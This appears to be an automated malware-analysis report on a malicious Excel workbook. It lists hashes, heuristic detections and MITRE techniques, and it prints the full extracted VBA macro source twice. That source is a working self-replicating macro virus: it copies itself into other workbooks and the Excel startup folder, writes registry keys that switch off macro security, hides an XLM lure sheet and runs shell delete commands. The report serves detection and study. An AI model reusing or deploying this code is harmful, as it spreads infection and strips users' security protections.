Office (OLE) malware analysis — malicious · c3093e083d52a36c

MALICIOUS

Office (OLE)

1.32 MB Created: 2014-12-17 01:48:28 Authoring application: Microsoft Excel First seen: 2015-09-24

MD5: 63188c54d214d1d88072613c9638cb90 SHA-1: 6ec952f5510e9bbf12f5e8503d227d19095f247d SHA-256: c3093e083d52a36cc72fce9b9e0514b093d22dd7dbce81863ade845ab4449ab5

524 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is an Excel 4.0 macro-enabled workbook that triggers on Workbook_open. Critical heuristics indicate the presence of XLM Auto_Open with an 'enable-content' lure and a potential Shell call in VBA. The VBA code also shows WScript.Shell usage and attempts self-replication, suggesting it's designed to download and execute a second-stage payload. The ClamAV detection name 'Xls.Malware.Mailcab-6776806-0' further supports its malicious nature.

Heuristics 13

ClamAV: Xls.Malware.Mailcab-6776806-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Mailcab-6776806-0
XLM Auto_Open workbook with payload URL or enable-content lure critical OLE_XLM_AUTOOPEN_PAYLOAD_LURE

Workbook contains an Excel 4.0 macro sheet with Auto_Open / Auto_Close and also exposes a payload URL or enable-content lure in the OLE bytes. This combination is a high-confidence XLM downloader/social-engineering pattern even when formula recovery cannot decode the full macro chain.
Excel 4.0 (XLM) Auto_Open + macro sheet critical OLE_XLM_AUTOOPEN

Workbook contains an Auto_Open / Auto_Close defined name together with an Excel 4.0 macro sheet — the canonical XLM auto-execution shape used by malware families such as Emotet and QakBot.
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code

Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA

Matched line in script

Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set oWshell = CreateObject("WScript.Shell")
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
.InsertLines 1, "Public WithEvents xx As Application"
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_open()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Private Sub Auto_Open()
```
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)
Matched line in script
```
    FName = Environ("Temp") & "\" & ModuleName & ".bas"
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11236 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11236 bytes
SHA-256: `a97fdf84284e8f853769e6a7ce10ef531b9a8a438f6e8f24f2aa953bcd52b456`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Public WithEvents xx As Application Attribute xx.VB_VarHelpID = -1 Private Sub Workbook_open() Set xx = Application On Error Resume Next Application.DisplayAlerts = False Call Do_What End Sub Private Sub xx_workbookOpen(ByVal wb As Workbook) On Error Resume Next wb.VBProject.References.AddFromGuid _ GUID:="{0002E157-0000-0000-C000-000000000046}", _ Major:=5, Minor:=3 Application.ScreenUpdating = False Application.DisplayAlerts = False CopyStart wb Application.ScreenUpdating = True End Sub Attribute VB_Name = "Sheet1" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet2" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet3" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "echo" Private Sub Auto_Open() Application.DisplayAlerts = False If ThisWorkbook.Path <> Application.StartupPath Then Application.ScreenUpdating = False Call Delete_This_WK Call CopyToWorkBook If Sheets(1).Name <> "Macro1" Then MoveMacro4 ThisWorkbook ThisWorkbook.Save Application.ScreenUpdating = True End If End Sub Private Sub CopyToWorkBook() Const DQUOTE = """" With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule .InsertLines 1, "Public WithEvents xx As Application" .InsertLines 2, "Private Sub Workbook_open()" .InsertLines 3, "Set xx = Application" .InsertLines 4, "On Error Resume Next" .InsertLines 5, "Application.DisplayAlerts = False" .InsertLines 6, "Call Do_What" .InsertLines 7, "End Sub" .InsertLines 8, "Private Sub xx_workbookOpen(ByVal wb As Workbook)" .InsertLines 9, "On Error Resume Next" .InsertLines 10, "wb.VBProject.References.AddFromGuid _" .InsertLines 11, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _" .InsertLines 12, "Major:=5, Minor:=3" .InsertLines 13, "Application.ScreenUpdating = False" .InsertLines 14, "Application.DisplayAlerts = False" .InsertLines 15, "CopyStart wb" .InsertLines 16, "Application.ScreenUpdating = True" .InsertLines 17, "End Sub" End With End Sub Private Sub Delete_This_WK() Dim VBProj As VBIDE.VBProject Dim VBComp As VBIDE.VBComponent Dim CodeMod As VBIDE.CodeModule Set VBProj = ThisWorkbook.VBProject Set VBComp = VBProj.VBComponents("ThisWorkbook") Set CodeMod = VBComp.CodeModule With CodeMod .DeleteLines 1, .CountOfLines End With End Sub Function Do_What() Attribute Do_What.VB_ProcData.VB_Invoke_Func = " \n14" If ThisWorkbook.Path <> Application.StartupPath Then RestoreAfterOpen Call OpenDoor Call Microsofthobby Call Hacking End If End Function Function CopyStart(ByVal wb As Workbook) Attribute CopyStart.VB_ProcData.VB_Invoke_Func = " \n14" On Error Resume Next Dim VBProj1 As VBIDE.VBProject Dim VBProj2 As VBIDE.VBProject Set VBProj1 = Workbooks("echo.xls").VBProject Set VBProj2 = wb.VBProject If CopyModule("echo", VBProj1, VBProj2, False) Then Exit Function End Function Function CopyModule(ModuleName As String, _ FromVBProject As VBIDE.VBProject, _ ToVBProject As VBIDE.VBProject, _ OverwriteExisting As Boolean) As Boolean Attribute CopyModule.VB_ProcData.VB_Invoke_Func = " \n14" On Error Resume Next Dim VBComp As VBIDE.VBComponent Dim FName As String Dim CompName As String Dim S As String Dim SlashPos As Long Dim ExtPos As Long Dim TempVBComp As VBIDE.VBComponent If FromVBProject Is Nothing Then CopyModule = False Exit Function End If If Trim(ModuleName) = vbNullString Then CopyModule = False Exit Function End If If ToVBProject Is Nothing Then CopyModule = False Exit Function End If If FromVBProject.Protection = vbext_pp_locked Then CopyModule = False Exit Function End If If ToVBProject.Protection = vbext_pp_locked Then CopyModule = False Exit Function End If On Error Resume Next Set VBComp = FromVBProject.VBComponents(ModuleName) If Err.Number <> 0 Then CopyModule = False Exit Function End If FName = Environ("Temp") & "\" & ModuleName & ".bas" If OverwriteExisting = True Then If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then Err.Clear Kill FName If Err.Number <> 0 Then CopyModule = False Exit Function End If End If With ToVBProject.VBComponents .Remove .Item(ModuleName) End With Else Err.Clear Set VBComp = ToVBProject.VBComponents(ModuleName) If Err.Number <> 0 Then If Err.Number = 9 Then Else CopyModule = False Exit Function End If End If End If FromVBProject.VBComponents(ModuleName).Export FileName:=FName SlashPos = InStrRev(FName, "\") ExtPos = InStrRev(FName, ".") CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1) Set VBComp = Nothing Set VBComp = ToVBProject.VBComponents(CompName) If VBComp Is Nothing Then ToVBProject.VBComponents.Import FileName:=FName Else If VBComp.Type = vbext_ct_Document Then Set TempVBComp = ToVBProject.VBComponents.Import(FName) With VBComp.CodeModule .DeleteLines 1, .CountOfLines S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines) .InsertLines 1, S End With On Error GoTo 0 ToVBProject.VBComponents.Remove TempVBComp End If End If Kill FName CopyModule = True End Function Function Microsofthobby() Attribute Microsofthobby.VB_ProcData.VB_Invoke_Func = " \n14" Dim myfile0 As String Dim MyFile As String On Error Resume Next myfile0 = ThisWorkbook.FullName MyFile = Application.StartupPath & "\echo.xls" If WorkbookOpen("echo.xls") And ThisWorkbook.Path <> Application.StartupPath Then Workbooks("echo.xls").Close False Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus Shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus Shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus If ThisWorkbook.Path <> Application.StartupPath Then Application.ScreenUpdating = False ThisWorkbook.IsAddin = True ThisWorkbook.SaveCopyAs MyFile ThisWorkbook.IsAddin = False Application.ScreenUpdating = True End If End Function Function OpenDoor() Attribute OpenDoor.VB_ProcData.VB_Invoke_Func = " \n14" Dim Fso, RK1 As String, RK2 As String, RK3 As String, RK4 As String Dim KValue1 As Variant, KValue2 As Variant Dim VS As String On Error Resume Next VS = Application.Version Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT") RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM" RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\Level" RK3 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM" RK4 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\Level" KValue1 = 1 KValue2 = 1 Call WReg(RK1, KValue1, "REG_DWORD") Call WReg(RK2, KValue2, "REG_DWORD") Call WReg(RK3, KValue1, "REG_DWORD") Call WReg(RK4, KValue2, "REG_DWORD") End Function Sub WReg(strkey As String, Value As Variant, ValueType As String) Attribute WReg.VB_ProcData.VB_Invoke_Func = " \n14" Dim oWshell Set oWshell = CreateObject("WScript.Shell") If ValueType = "" Then oWshell.RegWrite strkey, Value Else oWshell.RegWrite strkey, Value, ValueType End If Set oWshell = Nothing End Sub Private Sub MoveMacro4(ByVal wb As Workbook) On Error Resume Next Dim sht As Object wb.Sheets(1).Select Sheets.Add Type:=xlExcel4MacroSheet ActiveSheet.Name = "Macro1" Range("A2").Select ActiveCell.FormulaR1C1 = "=ERROR(FALSE)" Range("A3").Select ActiveCell.FormulaR1C1 = "=IF(ERROR.TYPE(RUN(""" & Application.UserName & """))=4)" Range("A4").Select ActiveCell.FormulaR1C1 = "=ALERT(""禁用宏，关闭 " & Chr(10) & Now & Chr(10) & "Please Enable Macro!"",3)" Range("A5").Select ActiveCell.FormulaR1C1 = "=FILE.CLOSE(FALSE)" Range("A6").Select ActiveCell.FormulaR1C1 = "=END.IF()" Range("A7").Select ActiveCell.FormulaR1C1 = "=RETURN()" For Each sht In wb.Sheets wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False Next wb.Excel4MacroSheets(1).Visible = xlSheetVeryHidden End Sub Private Function WorkbookOpen(WorkBookName As String) As Boolean WorkbookOpen = False On Error GoTo WorkBookNotOpen If Len(Application.Workbooks(WorkBookName).Name) > 0 Then WorkbookOpen = True Exit Function End If WorkBookNotOpen: End Function Private Function RestoreAfterOpen() Dim sht, del_sht, rng, del_frag As Boolean On Error Resume Next del_sht = ActiveSheet.Name Application.ScreenUpdating = False Application.DisplayAlerts = False For Each sht In ThisWorkbook.Sheets If sht.Name <> "Macro1" Then sht.Visible = xlSheetVisible Next For Each rng In Sheets(del_sht).Range("A1:F15") If InStr(rng.Value, "CONFIDENTIAL") > 0 Then del_frag = True Exit For End If Next If del_frag = True Then Sheets(del_sht).Delete Application.ScreenUpdating = True End Function Private Sub Hacking() 'this's hacking code Shell "explorer tencent://message/?uin=654486740" End Sub

SHA-256: a97fdf84284e8f853769e6a7ce10ef531b9a8a438f6e8f24f2aa953bcd52b456

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public WithEvents xx As Application
Attribute xx.VB_VarHelpID = -1
Private Sub Workbook_open()
Set xx = Application
On Error Resume Next
Application.DisplayAlerts = False
Call Do_What
End Sub
Private Sub xx_workbookOpen(ByVal wb As Workbook)
On Error Resume Next
wb.VBProject.References.AddFromGuid _
GUID:="{0002E157-0000-0000-C000-000000000046}", _
Major:=5, Minor:=3
Application.ScreenUpdating = False
Application.DisplayAlerts = False
CopyStart wb
Application.ScreenUpdating = True
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "echo"

Private Sub Auto_Open()
Application.DisplayAlerts = False
If ThisWorkbook.Path <> Application.StartupPath Then
  Application.ScreenUpdating = False
  Call Delete_This_WK
  Call CopyToWorkBook
  If Sheets(1).Name <> "Macro1" Then MoveMacro4 ThisWorkbook
  ThisWorkbook.Save
  Application.ScreenUpdating = True
End If
End Sub

Private Sub CopyToWorkBook()
  Const DQUOTE = """"
  With ThisWorkbook.VBProject.VBComponents("ThisWorkbook").CodeModule
.InsertLines 1, "Public WithEvents xx As Application"
.InsertLines 2, "Private Sub Workbook_open()"
.InsertLines 3, "Set xx = Application"
.InsertLines 4, "On Error Resume Next"
.InsertLines 5, "Application.DisplayAlerts = False"
.InsertLines 6, "Call Do_What"
.InsertLines 7, "End Sub"
.InsertLines 8, "Private Sub xx_workbookOpen(ByVal wb As Workbook)"
.InsertLines 9, "On Error Resume Next"
.InsertLines 10, "wb.VBProject.References.AddFromGuid _"
.InsertLines 11, "GUID:=" & DQUOTE & "{0002E157-0000-0000-C000-000000000046}" & DQUOTE & ", _"
.InsertLines 12, "Major:=5, Minor:=3"
.InsertLines 13, "Application.ScreenUpdating = False"
.InsertLines 14, "Application.DisplayAlerts = False"
.InsertLines 15, "CopyStart wb"
.InsertLines 16, "Application.ScreenUpdating = True"
.InsertLines 17, "End Sub"
End With
End Sub

Private Sub Delete_This_WK()
Dim VBProj As VBIDE.VBProject
Dim VBComp As VBIDE.VBComponent
Dim CodeMod As VBIDE.CodeModule
Set VBProj = ThisWorkbook.VBProject
Set VBComp = VBProj.VBComponents("ThisWorkbook")
Set CodeMod = VBComp.CodeModule
With CodeMod
    .DeleteLines 1, .CountOfLines
End With
End Sub

Function Do_What()
Attribute Do_What.VB_ProcData.VB_Invoke_Func = " \n14"
If ThisWorkbook.Path <> Application.StartupPath Then
  RestoreAfterOpen
  Call OpenDoor
  Call Microsofthobby
  Call Hacking
End If
End Function

Function CopyStart(ByVal wb As Workbook)
Attribute CopyStart.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
Dim VBProj1 As VBIDE.VBProject
Dim VBProj2 As VBIDE.VBProject
Set VBProj1 = Workbooks("echo.xls").VBProject
Set VBProj2 = wb.VBProject
If CopyModule("echo", VBProj1, VBProj2, False) Then Exit Function
End Function

Function CopyModule(ModuleName As String, _
    FromVBProject As VBIDE.VBProject, _
    ToVBProject As VBIDE.VBProject, _
    OverwriteExisting As Boolean) As Boolean
Attribute CopyModule.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    Dim VBComp As VBIDE.VBComponent
    Dim FName As String
    Dim CompName As String
    Dim S As String
    Dim SlashPos As Long
    Dim ExtPos As Long
    Dim TempVBComp As VBIDE.VBComponent

    If FromVBProject Is Nothing Then
        CopyModule = False
        Exit Function
    End If
    
    If Trim(ModuleName) = vbNullString Then
        CopyModule = False
        Exit Function
    End If
    
    If ToVBProject Is Nothing Then
        CopyModule = False
        Exit Function
    End If
    
    If FromVBProject.Protection = vbext_pp_locked Then
        CopyModule = False
        Exit Function
    End If
    
    If ToVBProject.Protection = vbext_pp_locked Then
        CopyModule = False
        Exit Function
    End If
    
    On Error Resume Next
    Set VBComp = FromVBProject.VBComponents(ModuleName)
    If Err.Number <> 0 Then
        CopyModule = False
        Exit Function
    End If
   
    FName = Environ("Temp") & "\" & ModuleName & ".bas"
    If OverwriteExisting = True Then
       
        If Dir(FName, vbNormal + vbHidden + vbSystem) <> vbNullString Then
            Err.Clear
            Kill FName
            If Err.Number <> 0 Then
                CopyModule = False
                Exit Function
            End If
        End If
        With ToVBProject.VBComponents
            .Remove .Item(ModuleName)
        End With
    Else
        
        Err.Clear
        Set VBComp = ToVBProject.VBComponents(ModuleName)
        If Err.Number <> 0 Then
            If Err.Number = 9 Then
               
            Else
               
                CopyModule = False
                Exit Function
            End If
        End If
    End If
   
    FromVBProject.VBComponents(ModuleName).Export FileName:=FName
   
    SlashPos = InStrRev(FName, "\")
    ExtPos = InStrRev(FName, ".")
    CompName = Mid(FName, SlashPos + 1, ExtPos - SlashPos - 1)
    
    Set VBComp = Nothing
    Set VBComp = ToVBProject.VBComponents(CompName)
    
    If VBComp Is Nothing Then
        ToVBProject.VBComponents.Import FileName:=FName
    Else
        If VBComp.Type = vbext_ct_Document Then
            
            Set TempVBComp = ToVBProject.VBComponents.Import(FName)
           
            With VBComp.CodeModule
                .DeleteLines 1, .CountOfLines
                S = TempVBComp.CodeModule.Lines(1, TempVBComp.CodeModule.CountOfLines)
                .InsertLines 1, S
            End With
            On Error GoTo 0
            ToVBProject.VBComponents.Remove TempVBComp
        End If
    End If
    Kill FName
    CopyModule = True
End Function

Function Microsofthobby()
Attribute Microsofthobby.VB_ProcData.VB_Invoke_Func = " \n14"
Dim myfile0 As String
Dim MyFile As String
On Error Resume Next
myfile0 = ThisWorkbook.FullName
MyFile = Application.StartupPath & "\echo.xls"
If WorkbookOpen("echo.xls") And ThisWorkbook.Path <> Application.StartupPath Then Workbooks("echo.xls").Close False
Shell Environ$("comspec") & " /c attrib -S -h """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
Shell Environ$("comspec") & " /c Del /F /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus
Shell Environ$("comspec") & " /c RD /S /Q """ & Application.StartupPath & "\echo.XLS""", vbMinimizedFocus

If ThisWorkbook.Path <> Application.StartupPath Then
     Application.ScreenUpdating = False
     ThisWorkbook.IsAddin = True
     ThisWorkbook.SaveCopyAs MyFile
     ThisWorkbook.IsAddin = False
     Application.ScreenUpdating = True
End If
End Function

Function OpenDoor()
Attribute OpenDoor.VB_ProcData.VB_Invoke_Func = " \n14"
Dim Fso, RK1 As String, RK2 As String, RK3 As String, RK4 As String
Dim KValue1 As Variant, KValue2 As Variant
Dim VS As String
On Error Resume Next
VS = Application.Version
Set Fso = CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")

RK1 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK2 = "HKEY_CURRENT_USER\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"
RK3 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\AccessVBOM"
RK4 = "HKEY_LOCAL_MACHINE\Software\Microsoft\Office\" & VS & "\Excel\Security\Level"

KValue1 = 1
KValue2 = 1

      Call WReg(RK1, KValue1, "REG_DWORD")
      Call WReg(RK2, KValue2, "REG_DWORD")
      Call WReg(RK3, KValue1, "REG_DWORD")
      Call WReg(RK4, KValue2, "REG_DWORD")

End Function

Sub WReg(strkey As String, Value As Variant, ValueType As String)
Attribute WReg.VB_ProcData.VB_Invoke_Func = " \n14"
    Dim oWshell
    Set oWshell = CreateObject("WScript.Shell")
    If ValueType = "" Then
        oWshell.RegWrite strkey, Value
    Else
        oWshell.RegWrite strkey, Value, ValueType
    End If
    Set oWshell = Nothing
End Sub


Private Sub MoveMacro4(ByVal wb As Workbook)
On Error Resume Next

  Dim sht As Object

    wb.Sheets(1).Select
    Sheets.Add Type:=xlExcel4MacroSheet
    ActiveSheet.Name = "Macro1"
   
    Range("A2").Select
    ActiveCell.FormulaR1C1 = "=ERROR(FALSE)"
    Range("A3").Select
    ActiveCell.FormulaR1C1 = "=IF(ERROR.TYPE(RUN(""" & Application.UserName & """))=4)"
    Range("A4").Select
    ActiveCell.FormulaR1C1 = "=ALERT(""禁用宏，关闭 " & Chr(10) & Now & Chr(10) & "Please Enable Macro!"",3)"
    Range("A5").Select
    ActiveCell.FormulaR1C1 = "=FILE.CLOSE(FALSE)"
    Range("A6").Select
    ActiveCell.FormulaR1C1 = "=END.IF()"
    Range("A7").Select
    ActiveCell.FormulaR1C1 = "=RETURN()"
    
    For Each sht In wb.Sheets
    wb.Names.Add sht.Name & "!Auto_Activate", "=Macro1!$A$2", False
    Next
    wb.Excel4MacroSheets(1).Visible = xlSheetVeryHidden
End Sub

Private Function WorkbookOpen(WorkBookName As String) As Boolean
  WorkbookOpen = False
  On Error GoTo WorkBookNotOpen
  If Len(Application.Workbooks(WorkBookName).Name) > 0 Then
    WorkbookOpen = True
    Exit Function
  End If
WorkBookNotOpen:
End Function

Private Function RestoreAfterOpen()
Dim sht, del_sht, rng, del_frag As Boolean
On Error Resume Next
del_sht = ActiveSheet.Name
Application.ScreenUpdating = False
Application.DisplayAlerts = False
For Each sht In ThisWorkbook.Sheets
    If sht.Name <> "Macro1" Then sht.Visible = xlSheetVisible
Next
For Each rng In Sheets(del_sht).Range("A1:F15")
If InStr(rng.Value, "CONFIDENTIAL") > 0 Then
del_frag = True
Exit For
End If
Next
If del_frag = True Then Sheets(del_sht).Delete
Application.ScreenUpdating = True

End Function

Private Sub Hacking()
'this's hacking code
Shell "explorer tencent://message/?uin=654486740"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.